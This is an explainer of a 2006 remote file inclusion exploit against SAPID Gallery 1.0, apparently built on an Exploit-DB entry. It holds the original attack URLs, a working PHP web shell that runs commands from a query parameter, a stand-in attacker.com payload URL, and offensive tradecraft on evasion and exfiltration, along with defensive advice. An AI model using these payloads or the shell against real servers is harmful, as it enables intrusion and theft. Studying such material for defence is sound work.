SAPID Gallery 1.0 'ROOT_PATH' Remote File Inclusion Explained
SAPID Gallery 1.0 'ROOT_PATH' Remote File Inclusion Explained
What this paper is
This paper, published in 2006 by Kacper of the DEVIL TEAM, describes a Remote File Inclusion (RFI) vulnerability in SAPID Gallery version 1.0. The vulnerability allows an attacker to include and execute arbitrary PHP files from a remote server by manipulating the root_path parameter.
Simple technical breakdown
SAPID Gallery, a web application, had a flaw in how it handled a configuration variable named root_path. This variable was intended to specify the base directory for certain gallery components. However, the application didn't properly sanitize the input provided for root_path.
When a user requests a page that uses root_path, the application might include files based on the value of this parameter. If an attacker can control root_path and point it to a URL on their own server, they can trick the SAPID Gallery application into downloading and executing PHP code from that remote URL. This is a classic Remote File Inclusion vulnerability.
The exploit examples show two ways to achieve this:
- Directly injecting a remote URL into
root_path. - Using PHP's global array (
$GLOBALS) to overwrite theroot_pathvariable.
Complete code and payload walkthrough
The provided exploit paper contains only the exploit technique and examples, not actual code or shellcode. The "code" here refers to the exploit strings and the PHP code that would be hosted on the attacker's server.
Exploit Strings:
http://www.site.com/[sapidgalery_path]/usr/extensions/get_calendar.inc.php?root_path=[evil_scripts]http://www.site.com/: The target website.[sapidgalery_path]: This is a placeholder for the directory where SAPID Gallery is installed on the target server. The attacker needs to know this path./usr/extensions/get_calendar.inc.php: This is a specific PHP file within the SAPID Gallery application that is vulnerable. It likely uses theroot_pathvariable.?root_path=: This indicates the start of the query string, where theroot_pathparameter is passed.[evil_scripts]: This is a placeholder for the URL of a malicious PHP script hosted on the attacker's server. This script will be downloaded and executed by the vulnerable SAPID Gallery application.
http://www.site.com/[sapidgalery_path]/usr/extensions/get_tree.inc.php?GLOBALS[root_path]=[evil_scripts]- This is similar to the first example, but it targets a different vulnerable file (
get_tree.inc.php). ?GLOBALS[root_path]=: This is a more advanced PHP technique.$GLOBALSis a superglobal array in PHP that contains references to all variables defined in the global scope. By setting$GLOBALS['root_path'], the attacker is directly manipulating the globalroot_pathvariable, potentially bypassing some sanitization that might occur on standard GET/POST parameters.[evil_scripts]: Again, a placeholder for the attacker's remote script URL.
- This is similar to the first example, but it targets a different vulnerable file (
Attacker's Remote Script ([evil_scripts]):
The paper does not provide the content of [evil_scripts]. However, for an RFI exploit, this would typically be a PHP file containing malicious code. A common example would be a simple web shell that allows the attacker to execute commands on the server.
Example of [evil_scripts] (Hypothetical Web Shell):
<?php
// This is a hypothetical web shell for demonstration purposes.
// In a real attack, this would be more sophisticated.
// Check if a command is provided
if (isset($_GET['cmd'])) {
// Sanitize the command to prevent some basic injection attempts
$cmd = ($_GET['cmd']);
// Execute the command and output the result
echo "<pre>";
echo htmlspecialchars(shell_exec($cmd));
echo "</pre>";
} else {
echo "<h1>SAPID Gallery RFI Payload</h1>";
echo "<p>Send a 'cmd' parameter to execute commands.</p>";
echo "<p>Example: ?cmd=ls -la</p>";
}
?>Code Fragment/Block -> Practical Purpose Mapping:
http://www.site.com/[sapidgalery_path]/usr/extensions/get_calendar.inc.php?root_path=[evil_scripts]-> Exploitation Vector 1: Leverages a vulnerable PHP file and theroot_pathparameter to include a remote script.http://www.site.com/[sapidgalery_path]/usr/extensions/get_tree.inc.php?GLOBALS[root_path]=[evil_scripts]-> Exploitation Vector 2: Uses$GLOBALSto directly manipulate theroot_pathvariable, potentially bypassing standard parameter filtering.[evil_scripts](as a URL) -> Payload Delivery Mechanism: The URL points to the attacker's controlled server hosting the malicious PHP code.- Hypothetical
[evil_scripts]PHP code -> Remote Code Execution: The actual malicious code that runs on the victim's server after being included.
Practical details for offensive operations teams
- Required Access Level: Unauthenticated access to the target web application. The vulnerability is exposed via GET requests.
- Lab Preconditions:
- A vulnerable instance of SAPID Gallery v1.0 must be set up.
- The attacker needs a web server accessible from the target to host the malicious PHP script (
[evil_scripts]). - Knowledge of the target web server's IP/domain and the installation path of SAPID Gallery.
- Tooling Assumptions:
- A web browser for crafting and sending requests.
- A simple HTTP server (e.g., Python's
http.server, Apache, Nginx) to host the malicious payload. - A text editor for creating the payload script.
- Potentially, a vulnerability scanner or manual reconnaissance tools to identify the
[sapidgalery_path].
- Execution Pitfalls:
- Incorrect
[sapidgalery_path]: If the path to the SAPID Gallery installation is wrong, the exploit will fail. - Firewall/WAF blocking: Network firewalls or Web Application Firewalls (WAFs) on the target side might block requests to external URLs (
[evil_scripts]) or detect the RFI pattern. - PHP Configuration (
allow_url_fopen): The vulnerability relies on PHP'sallow_url_fopendirective being enabled. If it's disabled, theincludeorrequirefunctions will not be able to fetch remote files. This was a common configuration in older PHP versions but is often disabled by default in modern setups. - Incorrect
[evil_scripts]URL: Typos or incorrect formatting of the remote script URL will prevent execution. - Payload Complexity: If the payload is too complex or contains characters that might be filtered by the target's server or WAF, it might fail.
- Incorrect
- Tradecraft Considerations:
- Reconnaissance: Accurately identifying the
[sapidgalery_path]is crucial. This might involve directory brute-forcing or examining the website's source code for clues. - Payload Hosting: Ensure the attacker's payload server is stable and accessible. Consider using a domain that doesn't immediately raise suspicion.
- Obfuscation (if needed): For more advanced scenarios, the payload might need obfuscation to evade signature-based detection by WAFs.
- Post-Exploitation: Once the payload is executed, the attacker can use it to gain further access, exfiltrate data, or pivot within the network.
- Reconnaissance: Accurately identifying the
Where this was used and when
This vulnerability was published in August 2006. SAPID Gallery was a web application available on SourceForge at the time. Exploits of this nature were common in the mid-2000s against PHP web applications that lacked proper input validation and relied on insecure configurations like allow_url_fopen. It's likely that this specific vulnerability was exploited in the wild by various actors targeting websites running this version of SAPID Gallery.
Defensive lessons for modern teams
- Input Validation is Paramount: Never trust user input. Always validate and sanitize all parameters, especially those used in file operations or external requests.
- Disable
allow_url_fopen: For security reasons,allow_url_fopenshould be disabled inphp.iniunless absolutely necessary for specific, controlled functionalities. - Use
include_pathSafely: Ifinclude_pathis used, ensure it only points to trusted, local directories. - Web Application Firewalls (WAFs): Deploy and properly configure WAFs to detect and block common attack patterns like RFI and LFI.
- Regular Patching and Updates: Keep all web applications and their dependencies updated to the latest secure versions. SAPID Gallery v1.0 is ancient and unsupported.
- Least Privilege: Ensure web server processes run with the minimum necessary privileges.
- File Inclusion Prevention: Developers should use functions like
realpath()orbasename()to ensure that included files are within expected directories and are not malicious.
ASCII visual (if applicable)
+-----------------+ +-----------------------+ +-----------------+
| Attacker Server |----->| Target Web Server |<-----| Victim User |
| (Hosts payload) | | (SAPID Gallery v1.0) | | (Browses site) |
+-----------------+ +-----------------------+ +-----------------+
^ |
| | 1. User requests page with crafted URL
| | (e.g., ?root_path=http://attacker.com/shell.php)
| |
| 3. Target includes and | 2. SAPID Gallery application processes request
| executes payload | and uses 'root_path' to fetch remote file.
| |
+------------------------+Source references
- Paper: SAPID Gallery 1.0 - 'ROOT_PATH' Remote File Inclusion
- Author: Kacper
- Published: 2006-08-07
- Exploit-DB ID: 2130
- URL: https://www.exploit-db.com/papers/2130
- Script Site: http://sapid.sourceforge.net/ (Note: This link may no longer be active or point to the original software)
Original Exploit-DB Content (Verbatim)
$$$$$$$$$$$$$$$ DEVIL TEAM THE BEST POLISH TEAM $$$$$$$$$$$$$$$
$$
$$ SAPID Gallery <= v.1 (root_path) Remote File Include Vulnerability
$$ Script site: http://sapid.sourceforge.net/
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$ Find by: Kacper (a.k.a Rahim)
$$
$$ Contact: kacper1964@yahoo.pl or http://www.devilteam.yum.pl
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$ Greetz: DragonHeart, Satan, Leito, Leon, Luzak,
$$ Adam, DeathSpeed, Drzewko, pepi
$$
$$ Specjal greetz: DragonHeart ;-)
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
Expl:
http://www.site.com/[sapidgalery_path]/usr/extensions/get_calendar.inc.php?root_path=[evil_scripts]
http://www.site.com/[sapidgalery_path]/usr/extensions/get_tree.inc.php?GLOBALS[root_path]=[evil_scripts]
#Pozdro dla wszystkich ;-)
# milw0rm.com [2006-08-07]